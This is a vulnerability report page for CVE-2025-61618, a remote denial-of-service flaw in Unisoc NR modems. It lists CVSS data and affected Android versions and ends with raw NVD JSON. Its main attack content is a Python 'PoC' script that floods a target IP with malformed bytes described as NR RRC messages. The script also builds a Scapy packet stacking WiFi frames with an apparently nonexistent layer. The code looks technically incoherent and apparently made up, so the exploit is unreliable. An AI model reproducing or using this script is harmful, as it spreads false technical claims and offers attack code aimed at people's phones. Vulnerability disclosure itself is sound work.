Security Vulnerability Report
CVE-2025-61618 CVSS 7.5 HIGH

CVE-2025-61618

Published: 2025-12-01 08:15:49
Last Modified: 2025-12-02 15:53:57

Description

In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:* - NOT VULNERABLE
Unisoc NR Modem (see the vendor advisory for specific versions)
Devices using Unisoc 5G NR baseband chips (specific versions pending vendor disclosure)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61618 PoC - NR Modem Input Validation Error
# This PoC demonstrates sending malformed NR RRC messages to trigger DoS
# Note: This is for educational and authorized testing purposes only
import socket
import struct
from scapy.all import *


def create_malformed_nr_rrc_message():
    """
    Create a malformed NR RRC Setup Request to trigger input validation error
    """
    # NR RRC Connection Request message with malformed UE Identity
    rrc_pdu = bytes([
        0x00, 0x01,  # RRC Transaction Identifier
        0x00, 0x40,  # RRC Message Type: Connection Request
        0x00, 0x00, 0x00, 0x00,  # Spare bits
        # Malformed UE Identity - trigger validation error
        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,  # Invalid length/format
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    ])
    return rrc_pdu


def send_nr_dos_packets(target_ip, port=38412, count=100):
    """
    Send malformed NR packets to trigger the vulnerability

    Args:
        target_ip: Target device IP address
        port: Target port (typically 38412 for NR NAS)
        count: Number of packets to send
    """
    print(f"[*] Starting DoS attack simulation on {target_ip}:{port}")
    print(f"[*] Sending {count} malformed NR RRC messages...")

    malformed_msg = create_malformed_nr_rrc_message()

    for i in range(count):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            sock.sendto(malformed_msg, (target_ip, port))
            sock.close()
            if i % 10 == 0:
                print(f"[*] Sent {i} packets...")
        except Exception as e:
            print(f"[!] Error sending packet: {e}")

    print("[*] Attack simulation completed")
    print("[*] If vulnerable, the NR modem should crash/reset")


def analyze_with_scapy(target_mac, ssid="TestNR"):
    """
    Alternative method using Scapy for LTE/NR packet crafting
    """
    print(f"[*] Crafting malformed NR RRC packet...")

    # Create base NR RRC packet
    pkt = RadioTap() / \
        Dot15dTaskFrame() / \
        Dot11() / \
        Dot11QoS() / \
        LLC() / \
        SNAP() / \
        Raw(load=create_malformed_nr_rrc_message())

    send(pkt, iface="wlan0", count=1, verbose=1)
    print("[*] Malformed packet sent")


if __name__ == "__main__":
    import argparse

    parser = argparse.ArgumentParser(description='CVE-2025-61618 PoC')
    parser.add_argument('target', help='Target IP address')
    parser.add_argument('--port', type=int, default=38412, help='Target port')
    parser.add_argument('--count', type=int, default=100, help='Number of packets')
    args = parser.parse_args()

    send_nr_dos_packets(args.target, args.port, args.count)
```

References

https://www.unisoc.com/en/support/announcement/1995394837938163714 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61618", "sourceIdentifier": "[email protected]", "published": "2025-12-01T08:15:48.867", "lastModified": "2025-12-02T15:53:57.450", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed"}, {"lang": "es", "value": "En el módem nr, hay una posible caída del sistema debido a una validación de entrada inadecuada. Esto podría llevar a una denegación de servicio remota sin necesidad de privilegios de ejecución adicionales."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": 
false, "criteria": "cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2DA04F2-5351-4043-A330-5397E627A222"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:*", "matchCriteriaId": "FC033D2C-ED1A-4EAB-A77B-8E1C88C74B0A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:*", "matchCriteriaId": "DC7743D5-B187-48D4-BC77-D8DCDF263166"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D1F3B9D-142F-4E70-8477-E26D921EF19A"}]}]}], "references": [{"url": "https://www.unisoc.com/en/support/announcement/1995394837938163714", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}